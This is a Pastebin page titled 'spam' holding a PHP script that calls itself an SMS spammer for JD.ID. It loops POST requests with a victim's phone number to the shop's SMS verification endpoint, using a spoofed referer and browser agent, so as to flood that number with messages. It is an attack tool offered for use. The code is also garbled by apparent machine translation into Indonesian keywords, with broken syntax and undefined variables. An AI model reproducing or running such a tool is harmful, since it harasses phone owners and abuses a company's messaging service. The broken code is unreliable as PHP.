Advertisement
MrRapMCT

spam

Apr 26th, 2018
215
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.58 KB | None | 0 0
  1. <? php
  2. fungsi jdidbom ($ no, $ jum, $ wait) {
  3.     $ x = 0;
  4.     sementara ($ x <$ jum) {
  5.         $ ch = curl_init ();
  6.         curl_setopt ($ ch, CURLOPT_URL, "http://sc.jd.id/phone/sendPhoneSms");
  7.         curl_setopt ($ ch, CURLOPT_POST, 1);
  8.         curl_setopt ($ ch, CURLOPT_POSTFIELDS, "phone =". $ no. "& smsType = 1");
  9.         curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true);
  10.         curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, true);
  11.         curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, 0);
  12.         curl_setopt ($ ch, CURLOPT_SSL_VERIFYHOST, 0);
  13.         curl_setopt ($ ch, CURLOPT_REFERER, 'http://sc.jd.id/phone/bindingPhone.html');
  14.         curl_setopt ($ ch, CURLOPT_USERAGENT, 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, seperti Gecko) Chrome / 58.0.3029.110 Safari / 537.36');
  15.         $ server_output = curl_exec ($ ch);
  16.         curl_close ($ ch);
  17.         echo $ server_output. "\ n";
  18.         tidur ($ wait);
  19.         $ x ++;
  20.         menyiram();
  21.     }
  22. }
  23. echo "
  24. ################################################## #########
  25.       [Spammer SMS Dari JD.ID]
  26.    Oleh: Mr.Rap-MCT
  27.    Hubungi Saya: +1(234) 262 9953
  28. Thanks To: M45KOT CY3R T34M
  29.    Tanggal: 26-04-2018
  30.    Terimakasih untuk semua
  31.    Penggunaan: php jdid.php
  32. ################################################## ######### \ nInput: ";
  33. echo "Nomor? (ex: 8xxxx) \ nInput:";
  34. $ jumlah = trim (fgets (STDIN));
  35. echo "Jumlah? \ nInput:";
  36. $ jumlah = trim (fgets (STDIN));
  37. echo "Jeda? 0-99999 (contoh: 1) \ nInput:";
  38. $ jeda = trim (fgets (STDIN));
  39. $ execute = jdidbom ($ number, $ amount, $ jeda);
  40. cetak $ eksekusi;
  41. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement